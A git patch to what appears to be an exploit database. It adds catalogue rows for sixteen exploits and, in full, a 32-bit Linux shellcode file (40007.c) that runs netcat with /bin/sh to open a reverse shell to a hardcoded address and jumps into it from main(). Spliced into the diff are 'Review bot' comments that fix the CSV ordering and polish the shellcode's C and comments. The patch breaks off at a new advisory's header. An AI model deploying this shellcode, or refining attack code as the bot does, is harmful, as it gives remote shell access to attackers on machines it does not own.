From 3739831fb2df2a7b0a5182182776002d2a1db93a Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 24 Jun 2016 05:06:19 +0000 Subject: [PATCH] DB: 2016-06-24 16 new exploits Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability ImpressPages CMS 3.8 - Stored XSS Vulnerability Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability Linux Netcat Reverse Shell - 32bit - 77 bytes PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS Getsimple CMS 3.3.10 - Arbitrary File Upload op5 v7.1.9 Configuration Command Execution op5 7.1.9 - Configuration Command Execution Alibaba Clone B2B Script - Arbitrary File Disclosure XuezhuLi FileSharing - Directory Traversal XuezhuLi FileSharing - (Add User) CSRF FinderView - Multiple Vulnerabilities --- files.csv | 30 +++-- .../arm/shellcode/{15314.S => 15314.asm} | 0 .../arm/shellcode/{15315.S => 15315.asm} | 0 .../arm/shellcode/{15316.S => 15316.asm} | 0 .../arm/shellcode/{15317.S => 15317.asm} | 0 .../webapps/{30726.2013-6922 => 30726.txt} | 0 platforms/lin_x86/shellcode/40007.c | 119 ++++++++++++++++++ .../multiple/webapps/{34148.TXT => 34148.txt} | 0 platforms/php/dos/{14678.zip => 14678.txt} | 0 .../php/webapps/{29790.JPG => 29790.txt} | 0 platforms/php/webapps/34007.txt | 96 ++------------ platforms/php/webapps/40006.txt | 13 ++ platforms/php/webapps/40008.txt | 45 +++++++ platforms/php/webapps/40009.txt | 57 +++++++++ platforms/php/webapps/40010.html | 27 ++++ 
platforms/php/webapps/40011.txt | 23 ++++ platforms/php/webapps/{9387.tx => 9387.txt} | 0 .../windows/dos/{15444.zip => 15444.txt} | 0 18 files changed, 312 insertions(+), 98 deletions(-) rename platforms/arm/shellcode/{15314.S => 15314.asm} (100%) rename platforms/arm/shellcode/{15315.S => 15315.asm} (100%) rename platforms/arm/shellcode/{15316.S => 15316.asm} (100%) rename platforms/arm/shellcode/{15317.S => 15317.asm} (100%) rename platforms/hardware/webapps/{30726.2013-6922 => 30726.txt} (100%) create mode 100755 platforms/lin_x86/shellcode/40007.c rename platforms/multiple/webapps/{34148.TXT => 34148.txt} (100%) rename platforms/php/dos/{14678.zip => 14678.txt} (100%) rename platforms/php/webapps/{29790.JPG => 29790.txt} (100%) create mode 100755 platforms/php/webapps/40006.txt create mode 100755 platforms/php/webapps/40008.txt create mode 100755 platforms/php/webapps/40009.txt create mode 100755 platforms/php/webapps/40010.html create mode 100755 platforms/php/webapps/40011.txt rename platforms/php/webapps/{9387.tx => 9387.txt} (100%) rename platforms/windows/dos/{15444.zip => 15444.txt} (100%) diff --git a/files.csv b/files.csv index 80646c465..36921ec70 100755 --- a/files.csv +++ b/files.csv 
@@ -8857,7 +8857,7 @@ id,file,description,date,author,platform,type,port
 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple Remote SQL Injection Vulnerabilities",2009-08-07,SwEET-DeViL,php,webapps,0
 9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-08-07,Red-D3v1L,php,webapps,0
 9386,platforms/windows/local/9386.txt,"Steam 54/894 - Local Privilege Escalation Vulnerability",2009-08-07,MrDoug,windows,local,0
-9387,platforms/php/webapps/9387.tx,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability",2009-08-07,"599eme Man",php,webapps,0
+9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability",2009-08-07,"599eme Man",php,webapps,0
 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 (forumid) Remote SQL Injection Vulnerability",2009-08-07,Ruzgarin_Oglu,php,webapps,0
 9390,platforms/php/webapps/9390.txt,"Typing Pal <= 1.0 (idTableProduit) SQL Injection Vulnerability",2009-08-07,Red-D3v1L,php,webapps,0
 9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0
@@ -12850,7 +12850,7 @@ id,file,description,date,author,platform,type,port
 14673,platforms/windows/local/14673.py,"Triologic Media Player 8 - (.m3u) Local Universal Unicode Buffer Overflow (SEH)",2010-08-17,"Glafkos Charalambous ",windows,local,0
 14674,platforms/windows/remote/14674.txt,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
 14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0
-14678,platforms/php/dos/14678.zip,"PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0
+14678,platforms/php/dos/14678.txt,"PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability",2010-08-18,"Canberk BOLAT",php,dos,0
 14679,platforms/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service Vulnerability",2010-08-18,"C.G. Tan",windows,dos,0
 14681,platforms/windows/local/14681.py,"A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit",2010-08-18,Dr_IDE,windows,local,0
 14683,platforms/windows/dos/14683.py,"Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) PoC",2010-08-18,Dr_IDE,windows,dos,0
@@ -13320,10 +13320,10 @@ id,file,description,date,author,platform,type,port
 15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0
 15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0
 15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0
-15314,platforms/arm/shellcode/15314.S,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15315,platforms/arm/shellcode/15315.S,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15316,platforms/arm/shellcode/15316.S,"ARM Loader Port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15317,platforms/arm/shellcode/15317.S,"ARM ifconfig eth0 and Assign Address",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15314,platforms/arm/shellcode/15314.asm,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15315,platforms/arm/shellcode/15315.asm,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15316,platforms/arm/shellcode/15316.asm,"ARM Loader Port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15317,platforms/arm/shellcode/15317.asm,"ARM ifconfig eth0 and Assign Address",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0
 15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
 15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - CSRF Change Admin Password PoC",2010-10-26,Sweet,php,webapps,0
@@ -13430,7 +13430,7 @@ id,file,description,date,author,platform,type,port
 15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
 15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion Vulnerability",2010-11-06,"Th3 RDX",php,webapps,0
 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader Remote File Inclusion Vulnerability",2010-11-06,ViciOuS,php,webapps,0
-15444,platforms/windows/dos/15444.zip,"G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0
+15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability",2010-11-06,"Nikita Tarakanov",windows,dos,0
 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0
 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
@@ -26697,7 +26697,7 @@ id,file,description,date,author,platform,type,port
 29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 data/y_3.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0
 29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 data/mysqlevents.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0
 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - (.reg) Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0
-29790,platforms/php/webapps/29790.JPG,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0
+29790,platforms/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0
 29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash PoC (.wav)",2013-11-23,"Akin Tosunlar",windows,dos,0
 29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 Index.php Cross-Site Scripting Vulnerability",2007-02-24,"Simon Bonnard",php,webapps,0
 29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability",2007-02-25,sehato,windows,dos,0
@@ -27668,7 +27668,7 @@ id,file,description,date,author,platform,type,port
 30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
 30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability",2007-10-31,"Bernhard Mueller",linux,dos,0
 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
-30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30726,platforms/hardware/webapps/30726.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
 30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
 30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection Vulnerability",2007-10-31,"Duncan Gilmore",linux,remote,0
 30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0
@@ -29741,7 +29741,7 @@ id,file,description,date,author,platform,type,port
 32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
 32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
 32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
-34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
+34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
 32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80
 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
@@ -30635,6 +30635,7 @@ id,file,description,date,author,platform,type,port
 34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
 34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
+40007,platforms/lin_x86/shellcode/40007.c,"Linux Netcat Reverse Shell - 32bit - 77 bytes",2016-06-23,CripSlick,lin_x86,shellcode,0
 34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
 34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
 34010,platforms/win32/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0
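Review bot: The new 40007 row is inserted between ids 34007 and 34008 instead of with the other 2016-06-23 rows, which the hunk at line 14 appends after 40005 at the end of the file; the next hunk (line 12) does the same with 40008, placing it between 36341 and 36342. files.csv is not strictly sorted elsewhere (34148 sits among the 3298x rows in the hunk at line 10), but scattering new ids into old regions makes duplicate-id checks and future merges on this file harder than they need to be. I would move the `40007,...` and `40008,...` rows to the tail of the file next to 40006 and 40009–40011 so that one commit's additions land in one place.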
@@ -32760,7 +32761,8 @@ id,file,description,date,author,platform,type,port
 36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
 36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
 36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
-36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
+36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
+40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80
 36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
 36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0
 36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
@@ -36155,7 +36157,7 @@ id,file,description,date,author,platform,type,port
 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Stored XSS",2016-06-17,"David Silveiro",php,webapps,80
 39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
-39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
+39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
 39975,platforms/lin_x86-64/shellcode/39975.c,"Linux x86_64 execve Shellcode - 15 bytes",2016-06-20,CripSlick,lin_x86-64,shellcode,0
 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
@@ -36184,3 +36186,7 @@ id,file,description,date,author,platform,type,port
 39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21
 40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80
 40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0
+40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80
+40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80
+40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - (Add User) CSRF",2016-06-23,HaHwul,php,webapps,80
+40011,platforms/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,php,webapps,80
diff --git a/platforms/arm/shellcode/15314.S b/platforms/arm/shellcode/15314.asm
similarity index 100%
rename from platforms/arm/shellcode/15314.S
rename to platforms/arm/shellcode/15314.asm
diff --git a/platforms/arm/shellcode/15315.S b/platforms/arm/shellcode/15315.asm
similarity index 100%
rename from platforms/arm/shellcode/15315.S
rename to platforms/arm/shellcode/15315.asm
diff --git a/platforms/arm/shellcode/15316.S b/platforms/arm/shellcode/15316.asm
similarity index 100%
rename from platforms/arm/shellcode/15316.S
rename to platforms/arm/shellcode/15316.asm
diff --git a/platforms/arm/shellcode/15317.S b/platforms/arm/shellcode/15317.asm
similarity index 100%
rename from platforms/arm/shellcode/15317.S
rename to platforms/arm/shellcode/15317.asm
diff --git a/platforms/hardware/webapps/30726.2013-6922 b/platforms/hardware/webapps/30726.txt
similarity index 100%
rename from platforms/hardware/webapps/30726.2013-6922
rename to platforms/hardware/webapps/30726.txt
diff --git a/platforms/lin_x86/shellcode/40007.c b/platforms/lin_x86/shellcode/40007.c
new file mode 100755
index 000000000..36105855e
--- /dev/null
+++ b/platforms/lin_x86/shellcode/40007.c
@@ -0,0 +1,119 @@
+#include
+#include
+
+//eben_s_dowling@georgiasouthern.edu
+//OffSec ID: OS-20614
+
+/*
+global _start
+
+_start:
+
+;/bin//nc -e///bin/sh 10.0.0.6 99
+
+ xor eax,eax ; clear eax
+ xor edx,edx ; clear edi
+
+ ; 0xIN-LAST IN-FIRST
+
+ push 0x39393939
+ mov esi, esp ; port in 4 hex bytes
+
+
+push eax ; push null ------------
+
+ jmp short ipADDR
+ continue:
+ pop edi ; ipADDR
+
+push eax ; push null ------------
+
+
+ push 0x68732F6E
+ push 0x69622F2F ; //bin/sh
+ push 0x2F2F652D ; -e//
+ mov ecx, esp
+
+
+push eax ; push null ------------
+
+ push 0x636e2f2f ;
+ push 0x6e69622f ; push /bin
+ mov ebx, esp ; mov /bin//nc
+
+
+push eax ; push null -----------
+
+
+;--------------FIRST PUSH FINISHED------------------------
+
+ push esi ; push port
+ push edi ; push ipADDR
+ push ecx ; push -e////bin/sh
+ push ebx ; push /bin//nc
+
+;--------------SECOND PUSH FINISHED------------------------
+
+ xor ecx, ecx
+ xor edx, edx
+
+;--------------REGISTERS CLEARED FOR EXECVE----------------
+ mov ecx,esp ; mov /bin//nc > ecx ecx = long pointer
+ mov al,0x0b ; execve syscall
+ int 0x80 ; syscall
+
+ipADDR:
+ call continue
+ db "10.0.0.6"
+*/
+
+#define PORT "\x39\x39\x39\x39" //port = 9999
+/*To keep this shellcode at 52 bytes,
+limit the port to 4 bytes*/
+#define ipADDR "\x31\x30\x2e\x30\x2e\x30\x2e\x36" //IP = 10.0.0.6
+//Both the IP & PORT are converted from ascii to hex
+
+
+
+unsigned char shellcode[] =
+ // <_start>
+"\x31\xc0" // xor %eax,%eax
+"\x31\xd2" // xor %edx,%edx
+"\x68"PORT // push $0x39393939
+"\x89\xe6" // mov %esp,%esi
+"\x50" // push %eax
+"\xeb\x2f" // jmp 804809d
+ //
+"\x5f" // pop %edi
+"\x50" // push %eax
+"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
+"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
+"\x68\x2d\x65\x2f\x2f" // push $0x2f2f652d
+"\x89\xe1" // mov %esp,%ecx
+"\x50" // push %eax
+"\x68\x2f\x2f\x6e\x63" // push $0x636e2f2f
+"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+"\x89\xe3" // mov %esp,%ebx
+"\x50" // push %eax
+"\x56" // 
push %esi +"\x57" // push %edi +"\x51" // push %ecx +"\x53" // push %ebx +"\x31\xc9" // xor %ecx,%ecx +"\x31\xd2" // xor %edx,%edx +"\x89\xe1" // mov %esp,%ecx +"\xb0\x0b" // mov $0xb,%al +"\xcd\x80" // int $0x80 + // +"\xe8\xcc\xff\xff\xff" // call 804806e + ipADDR + +; + + +int main(void) +{ + printf("Shellcode length: %d\n", strlen(shellcode)); + (*(void(*)(void))shellcode)(); + return 0; +} diff --git a/platforms/multiple/webapps/34148.TXT b/platforms/multiple/webapps/34148.txt similarity index 100% rename from platforms/multiple/webapps/34148.TXT rename to platforms/multiple/webapps/34148.txt diff --git a/platforms/php/dos/14678.zip b/platforms/php/dos/14678.txt similarity index 100% rename from platforms/php/dos/14678.zip rename to platforms/php/dos/14678.txt diff --git a/platforms/php/webapps/29790.JPG b/platforms/php/webapps/29790.txt similarity index 100% rename from platforms/php/webapps/29790.JPG rename to platforms/php/webapps/29790.txt diff --git a/platforms/php/webapps/34007.txt b/platforms/php/webapps/34007.txt index 4da44e3b3..70b13902e 100755 --- a/platforms/php/webapps/34007.txt +++ b/platforms/php/webapps/34007.txt @@ -115,11 +115,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - Vulnerability Name: SQL injection Severity: Critical @@ -154,11 +149,6 @@ Tools used: Mozilla Firefox browser - - - - - Vulnerability Name: Link Injection (facilitates Cross-Site Request Forgery) Severity: Critical Affected Users: All authenticated users @@ -208,11 +198,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php @@ -256,11 +241,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - Vulnerability Name: Cross-site scripting (reflected) Severity: Critical URL: http://localhost/dolibarr/index.php 
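Review bot: `printf("Shellcode length: %d\n", strlen(shellcode));` in main() passes a size_t to a %d conversion, which is undefined behaviour on the C side and prints garbage on platforms where the two widths differ; the portable line is `printf("Shellcode length: %zu\n", strlen(shellcode));`. The two `#include` lines at the top of the hunk carry no header name as rendered here — presumably `<stdio.h>` and `<string.h>` were lost in extraction, since printf and strlen are the only library calls, but the committed file should be checked rather than assumed. The comment `/*To keep this shellcode at 52 bytes, limit the port to 4 bytes*/` disagrees with the 77-byte count in both the commit title and the new files.csv row, and `xor edx,edx ; clear edi` names the wrong register; I would correct the comment to `; clear edx` and the byte count to match the array actually emitted, or drop the number from the comment. The file's documentation otherwise consists only of the author contact line; a one-line header stating what main() does (prints the length, then transfers control into the array) would help a reader who does not read the assembly listing.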
@@ -306,33 +286,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - - - - - - - - - - - - - - - - - - - - - - - Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -380,33 +333,6 @@ Tools used: Mozilla Firefox browser and Tamper Data Addon - - - - - - - - - - - - - - - - - - - - - - - - - - - Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -452,6 +378,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon   + + Vulnerability Name: Cross-site scripting (reflected) Severity: Critical 
@@ -497,6 +425,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon + + Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -522,9 +452,6 @@ Connection: keep-alive Affected parameter(s): mainmenu - - - Steps to replicate: 26. Open Dolibarr application in browser. 27. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 
@@ -543,6 +470,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon   + + Vulnerability Name: Cross-site scripting (Stored) Severity: Critical @@ -1166,9 +1095,6 @@ Connection: keep-alive Affected parameter(s): leftmenu - - - Steps to replicate: 31. Open Dolibarr application in browser. 32. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. 
@@ -1187,6 +1113,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon   + + Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -1227,6 +1155,8 @@ In cases where the application's functionality allows users to author content us Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Tools used: Mozilla Firefox browser and Tamper Data Addon   + + Vulnerability Name: Cross-site scripting (reflected) Severity: Critical @@ -1281,9 +1211,3 @@ dol_no_mouse_hover http://localhost/dolibarr/user/logout.php dol_hide_topmenu http://localhost/dolibarr/user/logout.php dol_hide_leftmenu http://localhost/dolibarr/user/logout.php - - - - - - 
diff --git a/platforms/php/webapps/40006.txt b/platforms/php/webapps/40006.txt
new file mode 100755
index 000000000..25ed96a7f
--- /dev/null
+++ b/platforms/php/webapps/40006.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
+# Date: 2016-06-22
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
